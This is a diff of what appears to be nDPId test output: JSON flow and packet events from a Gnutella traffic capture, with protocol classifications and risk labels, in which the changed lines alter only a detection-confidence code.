-00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3580,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":90738,"flow_last_seen":115276,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":242463,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"200.7.155.210","src_port":50291,"dst_port":28365,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3481,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":40005,"flow_last_seen":43055,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":232090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":55708,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3481,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":12529,"flow_last_seen":43193,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":232090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3481,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":12529,"flow_last_seen":43193,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":232090,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3580,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":90738,"flow_last_seen":115276,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":242463,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"200.7.155.210","src_port":50291,"dst_port":28365,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00565{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3580,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61191,"flow_last_seen":61191,"flow_idle_time":200000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":242463,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.2","src_port":57619,"dst_port":5351,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00550{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3580,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61191,"flow_last_seen":61191,"flow_idle_time":200000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":242463,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.2","src_port":57619,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00565{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3580,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61470,"flow_last_seen":61470,"flow_idle_time":200000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":242463,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.2","src_port":57620,"dst_port":5351,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -1754,7 +1754,7 @@ 00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3835,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":2,"flow_last_seen":252054,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":351,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":351,"pkt_l4_len":317,"thread_ts_msec":252054,"pkt":"CAAn5uVZUlQAEjUCCABFAAFRCikAAEARFruvtZz0CgACDyA\/cAkBPRaQR05EASwmAQF4nOspZwx09GAJCV7IpZrkwOGyfuucL\/YKSgxA5ul7fKtUoo+BmEVqnEHz4w6DmFpJxQ2LoneAmCrvr076FrIPxLztrlNpZ7EdxKw+W5fmKQLWdjuUO\/SR5kEQ89YS9ZflgSfAzLXPkmy89kNMWCRtJA824U5n1tpM3b1g2yS2Nd0Ig5jgZiDeJq8GYpZ\/Z3v0URXC\/DbZ444gmHmnX+lhup8KiGl7R\/PjVDEmsCOZ7GQ+SyiA1fL1v10UzQBW4LDRdFE0H9gK9VmuD4QYQcxT0+2tT8gKgpiMCwOCLijKg5gF5Z\/yPsmBDVN5yXzfwIgRwtS61CEK9AVbMCQcgAyId4AMiFNAjNaqm2ApiPc8WIIcdRgZGBhi9R+ZGjIxpEgd+fTSj7OAHwDkZn\/e"} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3837,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":463,"flow_packet_id":2,"flow_last_seen":252237,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":252237,"pkt":"CAAn5uVZUlQAEjUCCABFAABKCisAAEARAJDIB5vSCgACD27NcAkANlqcvVsxAoZuEFj\/eIRjgIUUAwEBABcAAADNbsgHm9IAAAAACAAAAMOCUUtEApadXA=="} 
00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3838,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":434,"flow_packet_id":2,"flow_last_seen":252481,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":252481,"pkt":"CAAn5uVZUlQAEjUCCABFAAFMCiwAAEAROsxyGLaCCgACD1bYcAkBOFVRR05EAXxtAQF4nOvJYQx09GAJCV7MpZrkwOFSJLGt6UbYMQYgUyupuGFR9A4Q89baZ0k2XvtBzNP3+FapRIMV3Fqi\/rI88ASIWaTGGTQ\/7jCIqfL+6qRvIftAzDutVTcXRR8HMavP1qV5ioC13XbXqbSz2A5W0Jm1NlN3L0TbImkjeYi2tuVBe8QOgZjrt6lzbzQ6AGZunfPFXkEZxCz\/zvboo6oamPltsscdQTDT9o7mx6liTGCnM9nJfJZQABvWr\/Qw3U8FxNy+OaqgRk0brI2v\/+2iaAawNoeNpoui+UDMU9PtrU\/ICoKYjAsDgi4oyoFd9pL5voERI4MDWzDENiDjtpuBeJs8kAHxLZAB8SCc4cES5KjDyMDAEKv\/yNSQiSFF6sinl36cBfwAxlh+fA=="} -00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":65065,"flow_last_seen":65065,"flow_idle_time":200000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":1042,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":57623,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":65065,"flow_last_seen":65065,"flow_idle_time":200000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":1042,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":57623,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71535,"flow_last_seen":71535,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.160.214.137","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71535,"flow_last_seen":71535,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.160.214.137","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71536,"flow_last_seen":71536,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.133.122.217","src_port":28681,"dst_port":23458,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -1763,7 +1763,7 @@ 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71540,"flow_last_seen":71540,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"154.3.42.104","src_port":28681,"dst_port":11804,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71537,"flow_last_seen":71537,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.205.126.102","src_port":28681,"dst_port":5193,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71537,"flow_last_seen":71537,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.205.126.102","src_port":28681,"dst_port":5193,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00913{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":126831,"flow_last_seen":130215,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10878,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50330,"dst_port":46906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00913{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":126831,"flow_last_seen":130215,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10878,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50330,"dst_port":46906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71538,"flow_last_seen":71538,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.39.154.69","src_port":28681,"dst_port":4832,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71538,"flow_last_seen":71538,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.39.154.69","src_port":28681,"dst_port":4832,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":70230,"flow_last_seen":70230,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"74.210.244.72","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -1772,7 +1772,7 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71540,"flow_last_seen":71540,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.239.213.146","src_port":28681,"dst_port":21750,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71536,"flow_last_seen":71536,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.38.9.82","src_port":28681,"dst_port":24223,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71536,"flow_last_seen":71536,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.38.9.82","src_port":28681,"dst_port":24223,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00630{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":129210,"flow_last_seen":129210,"flow_idle_time":140000,"flow_min_l4_payload_len":117,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"84.197.97.94","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00630{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":129210,"flow_last_seen":129210,"flow_idle_time":140000,"flow_min_l4_payload_len":117,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"84.197.97.94","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71538,"flow_last_seen":71538,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"202.151.63.59","src_port":28681,"dst_port":7624,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71538,"flow_last_seen":71538,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"202.151.63.59","src_port":28681,"dst_port":7624,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71537,"flow_last_seen":71537,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.134.167.82","src_port":28681,"dst_port":5820,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -1825,7 +1825,7 @@ 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72851,"flow_last_seen":72851,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.225.140.186","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72850,"flow_last_seen":72850,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.191.49.159","src_port":28681,"dst_port":1024,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72850,"flow_last_seen":72850,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.191.49.159","src_port":28681,"dst_port":1024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":12461,"flow_last_seen":75501,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":637,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} +00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":12461,"flow_last_seen":75501,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":637,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} 00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72851,"flow_last_seen":72851,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"79.86.173.45","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72851,"flow_last_seen":72851,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"79.86.173.45","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00562{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":72852,"flow_last_seen":131670,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.231.73.14","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -1937,49 +1937,49 @@ 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82065,"flow_last_seen":82065,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.126.240.32","src_port":28681,"dst_port":45313,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82065,"flow_last_seen":82065,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.134.139.39","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 